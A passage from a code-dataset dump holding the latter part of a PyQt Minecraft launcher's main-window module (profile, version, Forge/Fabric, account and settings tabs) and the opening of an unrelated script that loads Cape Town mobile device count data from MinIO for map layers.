canCreateShortcuts():\n createShortcut = QAction(QCoreApplication.translate(\"MainWindow\", \"Create Shortcut\"), self)\n createShortcut.triggered.connect(lambda: askCreateShortcut(self.env, self.env.profileCollection.profileList[self.currentRow()]))\n self.menu.addAction(createShortcut)\n\n self.menu.popup(QCursor.pos())\n\n def addProfile(self):\n self.mainWindow.profileWindow.loadProfile(Profile(QCoreApplication.translate(\"MainWindow\", \"New Profile\"), self.env), True)\n self.mainWindow.profileWindow.exec()\n\n def editProfile(self):\n self.mainWindow.profileWindow.loadProfile(self.env.profileCollection.profileList[self.currentRow()],False)\n self.mainWindow.profileWindow.exec()\n\n def copyProfile(self):\n self.mainWindow.profileWindow.loadProfile(self.env.profileCollection.profileList[self.currentRow()], True, True)\n self.mainWindow.profileWindow.exec()\n\n def removeProfile(self):\n if len(self.env.profileCollection.profileList) == 1:\n QMessageBox.critical(self.mainWindow, QCoreApplication.translate(\"MainWindow\", \"Can't delete Profile\"), QCoreApplication.translate(\"MainWindow\", \"You can't delete all Profiles. At least one Profile must stay.\"))\n else:\n del self.env.profileCollection.profileList[self.currentRow()]\n self.env.selectedProfile = self.env.profileCollection.profileList[0].id\n self.mainWindow.updateProfileList()\n\nclass VersionEditorTab(QTableWidget):\n def __init__(self, env: Environment):\n super().__init__(0, 2)\n self.env = env\n\n self.uninstallVersion = QAction(QCoreApplication.translate(\"MainWindow\", \"Uninstall Version\"), self)\n self.uninstallVersion.triggered.connect(self.uninstallVersionClicked)\n\n self.setSelectionBehavior(QAbstractItemView.SelectionBehavior.SelectRows)\n self.setHorizontalHeaderLabels((QCoreApplication.translate(\"MainWindow\", \"Minecraft Version\"), QCoreApplication.translate(\"MainWindow\", \"Version Type\")))\n self.horizontalHeader().setSectionResizeMode(0, QHeaderView.ResizeMode.Stretch)\n self.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeMode.Stretch)\n self.setSelectionMode(QAbstractItemView.SelectionMode.SingleSelection)\n self.verticalHeader().hide()\n self.setShowGrid(False)\n self.updateVersions()\n\n def updateVersions(self):\n if len(self.env.installedVersion) == 0:\n self.uninstallVersion.setEnabled(False)\n else:\n self.uninstallVersion.setEnabled(True)\n while self.rowCount() > 0:\n self.removeRow(0)\n count = 0\n for i in self.env.installedVersion:\n idItem = QTableWidgetItem(i[\"id\"])\n idItem.setFlags(idItem.flags() ^ Qt.ItemFlag.ItemIsEditable)\n typeItem = QTableWidgetItem(i[\"type\"])\n typeItem.setFlags(typeItem.flags() ^ Qt.ItemFlag.ItemIsEditable)\n self.insertRow(count)\n self.setItem(count, 0, idItem) \n self.setItem(count, 1, typeItem) \n count += 1\n\n def contextMenuEvent(self, event: QContextMenuEvent):\n self.menu = QMenu(self)\n\n self.menu.addAction(self.uninstallVersion)\n\n self.menu.popup(QCursor.pos())\n\n def uninstallVersionClicked(self):\n shutil.rmtree(os.path.join(self.env.minecraftDir, \"versions\", self.env.installedVersion[self.currentRow()][\"id\"]))\n del self.env.installedVersion[self.currentRow()]\n self.updateVersions()\n\nclass OptionsTab(QWidget):\n def __init__(self, env: Environment):\n super().__init__()\n self.env = env\n\n self.languageComboBox = QComboBox()\n self.urlEdit = QLineEdit()\n self.allowMultiLaunchCheckBox = QCheckBox(QCoreApplication.translate(\"MainWindow\", \"Allow starting multiple instances (not recommended)\"))\n self.extractNativesCheckBox = QCheckBox(QCoreApplication.translate(\"MainWindow\", \"Unpack natives separately for each instance\"))\n\n languageNames = getLanguageNames()\n self.languageComboBox.addItem(QCoreApplication.translate(\"MainWindow\", \"Use System Language\"), \"default\")\n self.languageComboBox.addItem(languageNames.get(\"en\", \"en\"), \"en\")\n for i in os.listdir(os.path.join(env.currentDir,\"translations\")):\n if not i.endswith(\".qm\"):\n continue\n\n lang = i.removeprefix(\"jdMinecraftLauncher_\").removesuffix(\".qm\")\n self.languageComboBox.addItem(languageNames.get(lang, lang), lang)\n\n for i in range(self.languageComboBox.count()):\n if self.languageComboBox.itemData(i) == env.settings.get(\"language\"):\n self.languageComboBox.setCurrentIndex(i)\n\n self.urlEdit.setText(env.settings.get(\"newsURL\"))\n self.allowMultiLaunchCheckBox.setChecked(self.env.settings.get(\"enableMultiLaunch\"))\n self.extractNativesCheckBox.setChecked(self.env.settings.get(\"extractNatives\"))\n\n self.allowMultiLaunchCheckBox.stateChanged.connect(self.multiLaunchCheckBoxChanged)\n self.extractNativesCheckBox.stateChanged.connect(self.extractNativesCheckBoxChanged)\n\n gridLayout = QGridLayout()\n gridLayout.addWidget(QLabel(QCoreApplication.translate(\"MainWindow\", \"Language:\")), 0, 0)\n gridLayout.addWidget(self.languageComboBox,0,1)\n gridLayout.addWidget(QLabel(QCoreApplication.translate(\"MainWindow\", \"News URL:\")),1,0)\n gridLayout.addWidget(self.urlEdit,1,1)\n\n mainLayout = QVBoxLayout()\n mainLayout.addLayout(gridLayout)\n mainLayout.addWidget(self.allowMultiLaunchCheckBox)\n mainLayout.addWidget(self.extractNativesCheckBox)\n mainLayout.addStretch(1)\n \n self.setLayout(mainLayout)\n\n def multiLaunchCheckBoxChanged(self):\n self.env.settings.set(\"enableMultiLaunch\", self.allowMultiLaunchCheckBox.isChecked())\n\n def extractNativesCheckBoxChanged(self):\n self.env.settings.set(\"extractNatives\", self.extractNativesCheckBox.isChecked())\n\nclass ForgeTab(QTableWidget):\n def __init__(self, env: Environment, mainWindow: \"MainWindow\"):\n self.env = env\n self.mainWindow = mainWindow\n super().__init__(0,2)\n\n self.horizontalHeader().setSectionResizeMode(0, QHeaderView.ResizeMode.Stretch)\n self.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeMode.Stretch)\n self.setSelectionMode(QAbstractItemView.SelectionMode.SingleSelection)\n self.horizontalHeader().hide()\n self.verticalHeader().hide()\n\n count = 0\n minecraft_version_check = {}\n\n try:\n forgeVersionList = minecraft_launcher_lib.forge.list_forge_versions()\n except Exception:\n print(\"Could not get Forge Versions\", file=sys.stderr)\n return\n\n for i in forgeVersionList:\n minecraft_version, _ = i.split(\"-\", 1)\n\n if minecraft_version in minecraft_version_check or not minecraft_launcher_lib.forge.supports_automatic_install(i):\n continue\n\n minecraft_version_check[minecraft_version] = True\n\n versionItem = QTableWidgetItem(i)\n versionItem.setFlags(versionItem.flags() ^ Qt.ItemFlag.ItemIsEditable)\n\n installButton = QPushButton(QCoreApplication.translate(\"MainWindow\", \"Install\"))\n\n installButton.clicked.connect(self.installButtonClicked)\n\n self.insertRow(count)\n self.setItem(count, 0, versionItem)\n self.setCellWidget(count, 1, installButton)\n\n count += 1\n\n def installForgeVersion(self, forgeVersion: str):\n self.mainWindow.installThread.setupForgeInstallation(forgeVersion)\n self.mainWindow.installThread.start()\n\n self.mainWindow.setInstallButtonsEnabled(False)\n\n def installButtonClicked(self):\n for i in range(self.rowCount()):\n if self.cellWidget(i, 1) == self.sender():\n self.installForgeVersion(self.item(i, 0).text())\n return\n\n def setButtonsEnabled(self, enabled: bool):\n for i in range(self.rowCount()):\n self.cellWidget(i, 1).setEnabled(enabled)\n\n\nclass FabricTab(QTableWidget):\n def __init__(self, env: Environment, mainWindow: \"MainWindow\"):\n self.env = env\n self.mainWindow = mainWindow\n super().__init__(0,2)\n\n self.horizontalHeader().setSectionResizeMode(0, QHeaderView.ResizeMode.Stretch)\n self.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeMode.Stretch)\n self.setSelectionMode(QAbstractItemView.SelectionMode.SingleSelection)\n self.horizontalHeader().hide()\n self.verticalHeader().hide()\n\n try:\n fabricVersionList = minecraft_launcher_lib.fabric.get_all_minecraft_versions()\n except Exception:\n print(\"Could not get Fabric Versions\", file=sys.stderr)\n return\n\n count = 0\n for i in fabricVersionList:\n if not i[\"stable\"]:\n continue\n\n versionItem = QTableWidgetItem(i[\"version\"])\n versionItem.setFlags(versionItem.flags() ^ Qt.ItemFlag.ItemIsEditable)\n\n installButton = QPushButton(QCoreApplication.translate(\"MainWindow\", \"Install\"))\n\n installButton.clicked.connect(self.installButtonClicked)\n\n self.insertRow(count)\n self.setItem(count, 0, versionItem)\n self.setCellWidget(count, 1, installButton)\n\n count += 1\n\n def installFabricVersion(self, fabricVersion: str):\n self.mainWindow.installThread.setupFabricInstallation(fabricVersion)\n self.mainWindow.installThread.start()\n\n self.mainWindow.setInstallButtonsEnabled(False)\n\n def installButtonClicked(self):\n for i in range(self.rowCount()):\n if self.cellWidget(i, 1) == self.sender():\n self.installFabricVersion(self.item(i, 0).text())\n return\n\n def setButtonsEnabled(self, enabled: bool):\n for i in range(self.rowCount()):\n self.cellWidget(i, 1).setEnabled(enabled)\n\n\nclass SwitchAccountButton(QPushButton):\n def __init__(self, text: str, env: Environment, pos: int):\n self.env = env\n self.pos = pos\n super().__init__(text)\n self.clicked.connect(self.clickCallback)\n\n def clickCallback(self):\n account = self.env.accountList[self.pos]\n if not self.env.offlineMode:\n try:\n self.env.account = getAccountDict(minecraft_launcher_lib.microsoft_account.complete_refresh(self.env.secrets.client_id, self.env.secrets.secret, self.env.secrets.redirect_url, account[\"refreshToken\"]))\n self.env.mainWindow.updateAccountInformation()\n self.env.selectedAccount = self.pos\n except minecraft_launcher_lib.exceptions.InvalidRefreshToken:\n self.env.loginWindow.reset()\n self.env.loginWindow.show()\n else:\n self.env.account = self.env.accountList[self.pos]\n self.env.mainWindow.updateAccountInformation()\n self.env.selectedAccount = self.pos\n\n\nclass AccountTab(QTableWidget):\n def __init__(self, env: Environment):\n super().__init__(0, 2)\n self.env = env\n\n self.setSelectionBehavior(QAbstractItemView.SelectionBehavior.SelectRows)\n self.setHorizontalHeaderLabels((QCoreApplication.translate(\"MainWindow\", \"Name\"), QCoreApplication.translate(\"MainWindow\", \"Switch\")))\n self.horizontalHeader().setSectionResizeMode(0, QHeaderView.ResizeMode.Stretch)\n self.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeMode.Stretch)\n self.verticalHeader().hide()\n self.updateAccountList()\n\n def updateAccountList(self):\n self.setRowCount(0)\n count = 0\n for i in self.env.accountList:\n nameItem = QTableWidgetItem(i[\"name\"])\n nameItem.setFlags(nameItem.flags() ^ Qt.ItemFlag.ItemIsEditable)\n button = SwitchAccountButton(QCoreApplication.translate(\"MainWindow\", \"Switch\"), self.env,count)\n self.insertRow(count)\n self.setItem(count, 0, nameItem)\n self.setCellWidget(count, 1, button)\n count += 1\n\n def addAccount(self):\n self.env.loginWindow.reset()\n self.env.loginWindow.show()\n\n def contextMenuEvent(self, event):\n menu = QMenu(self)\n\n addAccountAction = QAction(QCoreApplication.translate(\"MainWindow\", \"New Account\"), self)\n addAccountAction.triggered.connect(self.addAccount)\n menu.addAction(addAccountAction)\n\n menu.popup(QCursor.pos())\n\nclass AboutTab(QWidget):\n def __init__(self, env: Environment):\n super().__init__()\n\n self.titleLabel = QLabel(\"jdMinecraftLauncher \" + env.launcherVersion)\n self.fanmadeLabel = QLabel(QCoreApplication.translate(\"MainWindow\", \"This Launcher is fanmade and not from Mojang/Microsoft\"))\n self.dependencyLabel = QLabel(QCoreApplication.translate(\"MainWindow\", \"This Program uses minecraft-launcher-lib {{version}}\").replace(\"{{version}}\", minecraft_launcher_lib.utils.get_library_version()))\n self.licenseLabel = QLabel(QCoreApplication.translate(\"MainWindow\", \"This Program is licensed under GPL 3.0\"))\n self.viewSourceButton = QPushButton(QCoreApplication.translate(\"MainWindow\", \"View Source\"))\n copyrightLabel = QLabel(\"Copyright © 2019-2023 JakobDev\")\n\n self.viewSourceButton.clicked.connect(lambda: webbrowser.open(\"https://codeberg.org/JakobDev/jdMinecraftLauncher\"))\n\n self.titleLabel.setAlignment(Qt.AlignmentFlag.AlignCenter)\n self.fanmadeLabel.setAlignment(Qt.AlignmentFlag.AlignCenter)\n self.dependencyLabel.setAlignment(Qt.AlignmentFlag.AlignCenter)\n self.licenseLabel.setAlignment(Qt.AlignmentFlag.AlignCenter)\n copyrightLabel.setAlignment(Qt.AlignmentFlag.AlignCenter)\n\n self.mainLayout = QGridLayout()\n self.mainLayout.addWidget(QLabel(),0,0)\n self.mainLayout.addWidget(QLabel(),0,2)\n self.mainLayout.addWidget(self.titleLabel,0,1)\n self.mainLayout.addWidget(self.fanmadeLabel,1,1)\n self.mainLayout.addWidget(self.dependencyLabel,2,1)\n self.mainLayout.addWidget(self.licenseLabel,3,1)\n self.mainLayout.addWidget(copyrightLabel, 4, 1)\n self.mainLayout.addWidget(self.viewSourceButton, 5, 1)\n self.setLayout(self.mainLayout)\n\n\nclass GameOutputTab(QPlainTextEdit):\n def __init__(self, env: Environment) -> None:\n super().__init__()\n self.env = env\n self.setLineWrapMode(QPlainTextEdit.LineWrapMode.NoWrap)\n self.setReadOnly(True)\n\n def dataReady(self) -> None:\n cursor = self.textCursor()\n cursor.movePosition(cursor.MoveOperation.End)\n cursor.insertText(bytes(self.process.readAll()).decode(encoding=sys.stdout.encoding,errors=\"replace\"))\n self.moveCursor(cursor.MoveOperation.End)\n\n def procStarted(self) -> None:\n if self.profile.launcherVisibility != 2:\n self.env.mainWindow.hide()\n self.env.mainWindow.playButton.setEnabled(self.env.settings.get(\"enableMultiLaunch\"))\n\n def procFinish(self) -> None:\n if self.profile.launcherVisibility == 0:\n self.env.mainWindow.show()\n self.env.mainWindow.setFocus()\n elif self.profile.launcherVisibility == 1:\n self.env.mainWindow.close()\n self.env.mainWindow.playButton.setEnabled(True)\n if self.natives_path != \"\":\n try:\n shutil.rmtree(self.natives_path)\n except Exception:\n pass\n\n def executeCommand(self,profile: Profile, command: List[str], natives_path: str) -> None:\n self.profile = profile\n self.natives_path = natives_path\n self.process = QProcess(self)\n self.process.setWorkingDirectory(self.env.minecraftDir)\n self.process.readyRead.connect(self.dataReady)\n self.process.started.connect(self.procStarted)\n self.process.finished.connect(self.procFinish)\n self.process.start(command[0], command[1:])\n\n if not self.process.waitForStarted():\n self.setPlainText(QCoreApplication.translate(\"MainWindow\", \"Failed to start Minecraft\"))\n QMessageBox.critical(self, QCoreApplication.translate(\"MainWindow\", \"Failed to start\"), QCoreApplication.translate(\"MainWindow\", \"Minecraft could not be started. Maybe you use a invalid Java executable.\"))\n self.env.mainWindow.playButton.setEnabled(True)\n return\n\n\nclass Tabs(QTabWidget):\n def __init__(self, env: Environment, parent: \"MainWindow\"):\n super().__init__()\n QWebEngineProfile.defaultProfile().setHttpAcceptLanguage(QLocale.system().name())\n QWebEngineProfile.defaultProfile().setHttpUserAgent(\"jdMinecraftLauncher/\" + env.launcherVersion)\n webView = QWebEngineView()\n webView.load(QUrl(env.settings.get(\"newsURL\")))\n self.addTab(webView, QCoreApplication.translate(\"MainWindow\", \"News\"))\n self.profileEditor = ProfileEditorTab(env, parent)\n self.addTab(self.profileEditor, QCoreApplication.translate(\"MainWindow\", \"Profile Editor\"))\n self.versionTab = VersionEditorTab(env)\n self.addTab(self.versionTab, QCoreApplication.translate(\"MainWindow\", \"Version Editor\"))\n self.options = OptionsTab(env)\n self.addTab(self.options, QCoreApplication.translate(\"MainWindow\", \"Options\"))\n if not env.offlineMode:\n self.forgeTab = ForgeTab(env, parent)\n self.addTab(self.forgeTab, \"Forge\")\n self.fabricTab = FabricTab(env, parent)\n self.addTab(self.fabricTab, \"Fabric\")\n self.accountTab = AccountTab(env)\n self.addTab(self.accountTab, QCoreApplication.translate(\"MainWindow\", \"Account\"))\n about = AboutTab(env)\n self.addTab(about, QCoreApplication.translate(\"MainWindow\", \"About\"))\n\n def updateProfiles(self):\n self.profileEditor.updateProfiles()\n\nclass MainWindow(QWidget):\n def __init__(self, env: Environment):\n super().__init__()\n self.env = env\n self.profileListRebuild = False\n self.tabWidget = Tabs(env, self)\n self.profileWindow = ProfileWindow(self.env,self)\n self.progressBar = QProgressBar()\n self.profileComboBox = QComboBox()\n self.profilLabel = QLabel(QCoreApplication.translate(\"MainWindow\", \"Profile:\"))\n self.newProfileButton = QPushButton(QCoreApplication.translate(\"MainWindow\", \"New Profile\"))\n self.editProfileButton = QPushButton(QCoreApplication.translate(\"MainWindow\", \"Edit Profile\"))\n self.playButton = QPushButton(QCoreApplication.translate(\"MainWindow\", \"Play\"))\n self.accountLabel = QLabel()\n self.accountButton = QPushButton(QCoreApplication.translate(\"MainWindow\", \"Logout\"))\n\n self.progressBar.setTextVisible(True)\n self.profileComboBox.setCurrentIndex(self.env.selectedProfile)\n self.playButton.setSizePolicy(QSizePolicy(QSizePolicy.Policy.Preferred,QSizePolicy.Policy.Minimum))\n\n self.newProfileButton.clicked.connect(self.newProfileButtonClicked)\n self.editProfileButton.clicked.connect(self.editProfileButtonClicked)\n self.playButton.clicked.connect(self.playButtonClicked)\n self.accountButton.clicked.connect(self.logoutButtonClicked)\n self.profileComboBox.currentIndexChanged.connect(self.profileComboBoxIndexChanged)\n\n self.profileSelectLayout = QHBoxLayout()\n self.profileSelectLayout.addWidget(self.profilLabel)\n self.profileSelectLayout.addWidget(self.profileComboBox)\n\n self.profileButtonsLayout = QHBoxLayout()\n self.profileButtonsLayout.addWidget(self.newProfileButton)\n self.profileButtonsLayout.addWidget(self.editProfileButton)\n\n self.profileLayout = QVBoxLayout()\n self.profileLayout.addLayout(self.profileSelectLayout)\n self.profileLayout.addLayout(self.profileButtonsLayout)\n\n self.accountLayout = QVBoxLayout()\n self.accountLayout.addWidget(self.accountLabel)\n self.accountLayout.addWidget(self.accountButton)\n\n self.barLayout = QHBoxLayout()\n self.barLayout.addLayout(self.profileLayout)\n self.barLayout.addWidget(self.playButton)\n self.barLayout.addLayout(self.accountLayout)\n\n self.mainLayout = QVBoxLayout()\n self.mainLayout.addWidget(self.tabWidget)\n self.mainLayout.addWidget(self.progressBar)\n self.mainLayout.addLayout(self.barLayout)\n\n self.updateProfileList()\n \n self.setWindowTitle(\"jdMinecraftLauncher\")\n self.setLayout(self.mainLayout)\n\n self.installThread = InstallThread(env)\n self.installThread.text.connect(lambda text: self.progressBar.setFormat(text))\n self.installThread.progress.connect(lambda progress: self.progressBar.setValue(progress))\n self.installThread.progress_max.connect(lambda progress_max: self.progressBar.setMaximum(progress_max))\n self.installThread.finished.connect(self.installFinish)\n\n self._is_first_open = False\n\n def openMainWindow(self):\n if self._is_first_open:\n self.show()\n return\n\n if platform.system() == \"Linux\":\n from jdMinecraftLauncher.DBusService import DBusService\n DBusService(self.env, self.env.app)\n\n if self.env.args.launch_profile:\n profile = self.env.profileCollection.getProfileByName(self.env.args.launch_profile)\n if profile:\n self.env.mainWindow.launchProfile(profile)\n else:\n QMessageBox.critical(self, QCoreApplication.translate(\"MainWindow\", \"Profile not found\"), QCoreApplication.translate(\"MainWindow\", \"The given Profile was not found\"))\n elif self.env.args.url:\n parse_results = urllib.parse.urlparse(self.env.args.url)\n if parse_results.scheme == \"jdminecraftlauncher\":\n self._handleCustomURL(parse_results.path)\n\n self._is_first_open = True\n self.show()\n\n def _handleCustomURL(self, args: str) -> None:\n try:\n method, param = args.split(\"/\", 1)\n except ValueError:\n return\n\n if method == \"LaunchProfileByID\":\n profile = self.env.profileCollection.getProfileByID(param)\n if profile:\n self.env.profileCollection.mainWindow.launchProfile(profile)\n else:\n QMessageBox.critical(self, QCoreApplication.translate(\"MainWindow\", \"Profile not found\"), QCoreApplication.translate(\"MainWindow\", \"The given Profile was not found\"))\n elif method == \"LaunchProfileByName\":\n profile = self.profileCollection.env.getProfileByName(param)\n if profile:\n self.env.mainWindow.launchProfile(profile)\n else:\n QMessageBox.critical(self, QCoreApplication.translate(\"MainWindow\", \"Profile not found\"), QCoreApplication.translate(\"MainWindow\", \"The given Profile was not found\"))\n\n def updateProfileList(self):\n currentIndex = 0\n self.profileListRebuild = True\n self.profileComboBox.clear()\n for count, i in enumerate(self.env.profileCollection.profileList):\n self.profileComboBox.addItem(i.name)\n if i.id == self.env.profileCollection.selectedProfile:\n currentIndex = count\n self.tabWidget.updateProfiles()\n self.profileComboBox.setCurrentIndex(currentIndex)\n self.profileListRebuild = False\n\n def profileComboBoxIndexChanged(self, index: int):\n if not self.profileListRebuild:\n self.env.profileCollection.selectedProfile = self.env.profileCollection.profileList[index].id\n \n def newProfileButtonClicked(self):\n self.profileWindow.loadProfile(self.env.profileCollection.getSelectedProfile(), True, True)\n self.profileWindow.exec()\n\n def editProfileButtonClicked(self):\n self.profileWindow.loadProfile(self.env.profileCollection.getSelectedProfile(), False)\n self.profileWindow.exec()\n\n def launchProfile(self, profile: Profile) -> None:\n if self.env.offlineMode:\n if os.path.isdir(os.path.join(self.env.minecraftDir,\"versions\",profile.getVersionID())):\n self.startMinecraft(profile)\n else:\n QMessageBox.critical(self, QCoreApplication.translate(\"MainWindow\", \"No Internet Connection\"), QCoreApplication.translate(\"MainWindow\", \"You need a internet connection to install a new version, but you are still able to play already installed versions.\"))\n else:\n self.installVersion(profile)\n\n def playButtonClicked(self):\n self.launchProfile(self.env.profileCollection.getSelectedProfile())\n\n def logoutButtonClicked(self):\n if self.env.offlineMode:\n QMessageBox.critical(self, QCoreApplication.translate(\"MainWindow\", \"No Internet Connection\"), QCoreApplication.translate(\"MainWindow\", \"This Feature needs a internet connection\"))\n return\n del self.env.accountList[self.env.selectedAccount]\n if len(self.env.accountList) == 0:\n self.hide()\n self.env.loginWindow.show()\n self.env.loginWindow.setFocus()\n else:\n self.env.account = self.env.accountList[0]\n self.updateAccountInformation()\n\n def startMinecraft(self, profile: Profile):\n if self.env.settings.get(\"extractNatives\"):\n natives_path = os.path.join(tempfile.gettempdir(), \"minecraft_natives_\" + str(random.randrange(0, 10000000)))\n else:\n natives_path = \"\"\n args = getMinecraftCommand(self.env.profileCollection.getSelectedProfile(), self.env, natives_path)\n o = GameOutputTab(self.env)\n tabid = self.tabWidget.addTab(o, QCoreApplication.translate(\"MainWindow\", \"Game Output\"))\n self.tabWidget.setCurrentIndex(tabid)\n o.executeCommand(profile,args,natives_path)\n\n def installFinish(self) -> None:\n if self.installThread.getError() is not None:\n text = QCoreApplication.translate(\"MainWindow\", \"Due to an error, the installation could not be completed\") + \"

\"\n text += QCoreApplication.translate(\"MainWindow\", \"This may have been caused by a network error\")\n\n msgBox = QMessageBox()\n msgBox.setWindowTitle(QCoreApplication.translate(\"MainWindow\", \"Installation failed\"))\n msgBox.setText(text)\n msgBox.setDetailedText(self.installThread.getError())\n msgBox.exec()\n\n self.progressBar.setValue(0)\n self.progressBar.setFormat(\"\")\n self.setInstallButtonsEnabled(True)\n\n return\n\n if self.installThread.shouldStartMinecraft() and self.installThread.getError() is None:\n self.env.updateInstalledVersions()\n self.tabWidget.versionTab.updateVersions()\n self.startMinecraft(self.env.current_running_profile)\n else:\n self.env.loadVersions()\n self.profileWindow.updateVersionsList()\n self.setInstallButtonsEnabled(True)\n\n def installVersion(self, profile: Profile):\n self.env.current_running_profile = profile\n self.playButton.setEnabled(False)\n self.installThread.setup(profile)\n self.installThread.start()\n\n def updateAccountInformation(self):\n self.accountLabel.setText(QCoreApplication.translate(\"MainWindow\", \"Welcome, {{name}}\").replace(\"{{name}}\", self.env.account[\"name\"]))\n self.tabWidget.accountTab.updateAccountList()\n if self.env.offlineMode:\n self.playButton.setText(QCoreApplication.translate(\"MainWindow\", \"Play Offline\"))\n else:\n self.playButton.setText(QCoreApplication.translate(\"MainWindow\", \"Play\"))\n\n def setInstallButtonsEnabled(self, enabled: bool):\n self.playButton.setEnabled(enabled)\n self.tabWidget.forgeTab.setButtonsEnabled(enabled)\n self.tabWidget.fabricTab.setButtonsEnabled(enabled)\n\n def closeEvent(self,event):\n if self.env.args.dont_save_data:\n event.accept()\n sys.exit(0)\n\n options = self.tabWidget.options\n self.env.profileCollection.save()\n self.env.settings.set(\"language\", options.languageComboBox.currentData())\n self.env.settings.set(\"newsURL\", options.urlEdit.text())\n self.env.settings.set(\"enableMultiLaunch\", options.allowMultiLaunchCheckBox.isChecked())\n self.env.settings.set(\"extractNatives\", options.extractNativesCheckBox.isChecked())\n self.env.settings.save(os.path.join(self.env.dataDir, \"settings.json\"))\n with open(os.path.join(self.env.dataDir, \"microsoft_accounts.json\"),\"w\") as f:\n data = {}\n data[\"selectedAccount\"] = self.env.selectedAccount\n data[\"accountList\"] = []\n for count, i in enumerate(self.env.accountList):\n if i[\"name\"] in self.env.disableAccountSave:\n if count == data[\"selectedAccount\"]:\n data[\"selectedAccount\"] = 0\n else:\n data[\"accountList\"].append(i)\n json.dump(data, f, ensure_ascii=False, indent=4)\n event.accept()\n sys.exit(0)\n","repo_name":"JakobDev/jdMinecraftLauncher","sub_path":"jdMinecraftLauncher/gui/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":33462,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"20120857726","text":"import json\nimport logging\nimport os\nimport pprint\nimport sys\nimport tempfile\n\nfrom db_utils import minio_utils\nimport geopandas\nimport numpy\nimport pandas\n\nimport city_map_layers_to_minio\n\nMINIO_COVID_BUCKET = \"covid\"\nMINIO_HEX_BUCKET = \"city-hexes.polygons\"\nMINIO_EDGE_CLASSIFICATION = minio_utils.DataClassification.EDGE\nMINIO_LAKE_CLASSIFICATION = minio_utils.DataClassification.LAKE\n\nDATA_PUBLIC_PREFIX = \"data/public/\"\nDATA_RESTRICTED_PREFIX = \"data/private/\"\n\nCT_MOBILE_METRICS = \"data/private/ct_mobile_device_count_metrics.csv\"\nTIMESTAMP_COL = \"timestamp\"\nHOURLY_METRIC_POLYGON_ID = \"polygon_id\"\nUPTIME_COL_PREFIX = \"Uptime_\"\nDOWNTIME_COL_PREFIX = \"Downtime_\"\nDESCRIBE_COL_SUFFIXES = [\"25%\", \"50%\", \"75%\", \"count\", \"max\", \"mean\", \"min\", \"std\"]\nPLOT_COL_SUFFIXES = [\"50%\"]\n\nPOLYGON_ID_COL = \"id\"\n\nDEVICE_COUNT_THRESHOLD = 50\nTEMPORAL_FILTER_WINDOW = pandas.Timedelta(days=28)\n\nCT_VODACOM_POLYGONS = \"ct_vodacom_polygons.geojson\"\nCT_HEX_L7_FILENAME = \"city-hex-polygons-7.geojson\"\nCT_HEX_L8_FILENAME = \"city-hex-polygons-8.geojson\"\nCT_WARD_FILENAME = \"ct_wards.geojson\"\nCT_HEALTH_DISTRICT_FILENAME = \"health_districts.geojson\"\n\nWARD_MOBILE_DATA_SUFFIX = \"ward_mobile_count.geojson\"\nHEX_L7_MOBILE_DATA_SUFFIX = \"hex_l7_mobile_count.geojson\"\nHEX_L8_MOBILE_DATA_SUFFIX = \"hex_l8_mobile_count.geojson\"\nDISTRICT_MOBILE_DATA_SUFFIX = \"district_mobile_count.geojson\"\nPOLYGON_MOBILE_DATA_SUFFIX = \"polygon_mobile_count.geojson\"\n\nCHOROPLETH_LAYERS = {\n WARD_MOBILE_DATA_SUFFIX,\n HEX_L7_MOBILE_DATA_SUFFIX,\n HEX_L8_MOBILE_DATA_SUFFIX,\n DISTRICT_MOBILE_DATA_SUFFIX,\n POLYGON_MOBILE_DATA_SUFFIX,\n}\n\nCHOROPLETH_SOURCE_LAYERS = {\n HEX_L7_MOBILE_DATA_SUFFIX: CT_HEX_L7_FILENAME,\n HEX_L8_MOBILE_DATA_SUFFIX: CT_HEX_L8_FILENAME,\n WARD_MOBILE_DATA_SUFFIX: CT_WARD_FILENAME,\n DISTRICT_MOBILE_DATA_SUFFIX: CT_HEALTH_DISTRICT_FILENAME,\n POLYGON_MOBILE_DATA_SUFFIX: CT_VODACOM_POLYGONS\n}\n\nLAYER_FILES = (\n (CT_VODACOM_POLYGONS, MINIO_EDGE_CLASSIFICATION, MINIO_COVID_BUCKET, DATA_RESTRICTED_PREFIX),\n (CT_HEX_L7_FILENAME, MINIO_LAKE_CLASSIFICATION, MINIO_HEX_BUCKET, \"\"),\n (CT_HEX_L8_FILENAME, MINIO_LAKE_CLASSIFICATION, MINIO_HEX_BUCKET, \"\"),\n (CT_WARD_FILENAME, MINIO_EDGE_CLASSIFICATION, MINIO_COVID_BUCKET, DATA_PUBLIC_PREFIX),\n (CT_HEALTH_DISTRICT_FILENAME, MINIO_EDGE_CLASSIFICATION, MINIO_COVID_BUCKET, DATA_PUBLIC_PREFIX),\n)\n\nHEX_COUNT_INDEX_PROPERTY = \"index\"\nCHOROPLETH_COL_LOOKUP = {\n # filename: (col name in gdf, sanitising function)\n WARD_MOBILE_DATA_SUFFIX: (\"WardID\", lambda ward: (str(int(ward)) if pandas.notna(ward) else None)),\n HEX_L7_MOBILE_DATA_SUFFIX: (HEX_COUNT_INDEX_PROPERTY, lambda hex: hex),\n HEX_L8_MOBILE_DATA_SUFFIX: (HEX_COUNT_INDEX_PROPERTY, lambda hex: hex),\n DISTRICT_MOBILE_DATA_SUFFIX: (\"CITY_HLTH_RGN_NAME\", lambda district: district.upper()),\n POLYGON_MOBILE_DATA_SUFFIX: (\"id\", lambda polygon: polygon),\n}\n\nNORM_PREFIX = \"Norm\"\nDELTA_SUFFIX = \"Delta_\"\nRELATIVE_DELTA_PREFIX = \"RelativeDelta_\"\nRELATIVE_DELTA_PERCENT_PREFIX = \"RelativeDeltaPercent_\"\n\nCASE_MAP_PREFIX = \"widgets/private/case_count_maps/\"\n\n\ndef get_mobile_data(minio_access, minio_secret):\n with tempfile.NamedTemporaryFile() as temp_datafile:\n minio_utils.minio_to_file(\n filename=temp_datafile.name,\n minio_filename_override=CT_MOBILE_METRICS,\n minio_bucket=MINIO_COVID_BUCKET,\n minio_key=minio_access,\n minio_secret=minio_secret,\n data_classification=MINIO_EDGE_CLASSIFICATION,\n )\n\n mobile_data_df = pandas.read_csv(temp_datafile.name)\n\n for col in (TIMESTAMP_COL,):\n mobile_data_df[col] = pandas.to_datetime(mobile_data_df[col])\n\n mobile_data_df.set_index([TIMESTAMP_COL, 